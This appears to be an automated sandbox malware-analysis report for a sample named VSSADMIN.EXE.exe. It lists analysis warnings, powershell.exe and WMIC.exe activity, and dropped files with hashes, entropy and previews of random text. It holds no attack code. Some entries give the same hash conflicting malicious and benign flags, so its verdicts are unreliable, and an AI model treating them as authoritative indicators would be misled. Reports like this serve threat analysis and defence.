• Excluded domains from analysis (whitelisted): kv601.prod.do.dsp.mp.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, client.wns.windows.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, mm-mm.bing.net.trafficmanager.net, dual-a-0001.a-msedge.net, gstatic.com, displaycatalog.mp.microsoft.com, arc.msn.com
• Execution Graph export aborted for target powershell.exe, PID 6128 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7028 because it is empty
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                    • VT rate limit hit for: VSSADMIN.EXE.exe
                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    22:15:58API Interceptor79x Sleep call for process: powershell.exe modified
                                                                                                                                                                    22:15:58API Interceptor7x Sleep call for process: WMIC.exe modified
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):7380816
                                                                                                                                                                    Entropy (8bit):7.992692630132626
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:98304:9jzHqdVfB2GyuT/9vUIdD9C+z3zO917vOTh+ezsNh75S2zh/hQqIvmJ1YPFlVtqU:9PQsGbT/9bvLz3S1bA32zOqxYPdH
                                                                                                                                                                    MD5:B8E16B93BE678043EC587EC1C759C2DE
                                                                                                                                                                    SHA1:A8C98BA05AC710A92C4DF15956F81CF81073746F
                                                                                                                                                                    SHA-256:15DD97919EBCB246ADD4FC9E9B201BDD67DA510C79F8D89CB4EDC7FBF64858FA
                                                                                                                                                                    SHA-512:43728E686D684998E6E80344E7A0F05CAA106262CEBC5B5815619B74EA7856DAB13B2954085E188D7EC3B96581390D86A4D4BEF13C3FDA9FD26844A9494D571F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                                                                    Reputation:low
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1104
Entropy (8bit): 5.27634052513024
Encrypted: false
SSDEEP: 24:3qPpQdo4KAxX5qRP6hTpsFL9t3UqKaBMKk9LC:6Pei4nqRSXsFL9tkqpBMN9+
MD5: 519FAAF473483468B40797D69DC21C2F
SHA1: A9924A714FFBC72D28B3B9B7D4620FFF1C1252B0
SHA-256: 96ED4EEF199ED8B5602E4F74C1B0BDF0B313F1C54735A1FC07287FEA1AABBB98
SHA-512: 6D48FBB8068717FE3CB48730053BE2A518310E87347671BAF1D6E5DA5791F093320869F54DF769CEC9587F586A143DB5C9ACE1E10D41F53015E8CC2EF6B3BFE0
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.705615236042988
Encrypted: false
SSDEEP: 24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5: 159C7BA9D193731A3AAE589183A63B3F
SHA1: 81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256: 1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512: 2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.692693183518806
Encrypted: false
SSDEEP: 24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5: 78F042E25B7FAF970F75DFAA81955268
SHA1: F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256: E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512: CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.699548026888946
Encrypted: false
SSDEEP: 24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5: A0DC32426FC8BF469784A49B3D092ADC
SHA1: 0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256: A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512: DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.694982189683734
Encrypted: false
SSDEEP: 24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5: E49F84B05A175C231342E6B705A24A44
SHA1: 41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256: EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512: 84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.687722658485212
Encrypted: false
SSDEEP: 24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5: 9A59DF7A478E34FB1DD60514E5C85366
SHA1: DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256: 582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512: 70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious: true
Reputation: low
Process: C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.699434772658264
Encrypted: false
SSDEEP: 24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5: 02D3A9BE2018CD12945C5969F383EF4A
SHA1: 085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256: 6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512: A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious: true
Reputation: low
                                                                                                                                                                    Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699434772658264
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                    MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                    SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                    SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                    SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.695685570184741
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                    MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                    SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                    SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                    SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.695685570184741
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                    MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                    SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                    SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                    SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.701757898321461
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                    MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                    SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                    SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                    SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.688284131239007
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                    MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                    SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                    SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                    SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.69156792375111
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                    MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                    SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                    SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                    SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.705615236042988
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                    MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                    SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                    SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                    SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.692693183518806
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                    MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                    SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                    SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                    SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview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
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699548026888946
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                    MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                    SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                    SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                    SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.694982189683734
Encrypted:false
SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:E49F84B05A175C231342E6B705A24A44
SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:false
Reputation:low
Preview:
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.687722658485212
Encrypted:false
SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:9A59DF7A478E34FB1DD60514E5C85366
SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:false
Reputation:low
Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.699434772658264
Encrypted:false
SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:02D3A9BE2018CD12945C5969F383EF4A
SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:false
Reputation:low
Preview:
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.699434772658264
Encrypted:false
SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:02D3A9BE2018CD12945C5969F383EF4A
SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:false
Reputation:low
Preview:
Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.695685570184741
Encrypted:false
SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:A28F7445BB3D064C83EB9DBC98091F76
SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
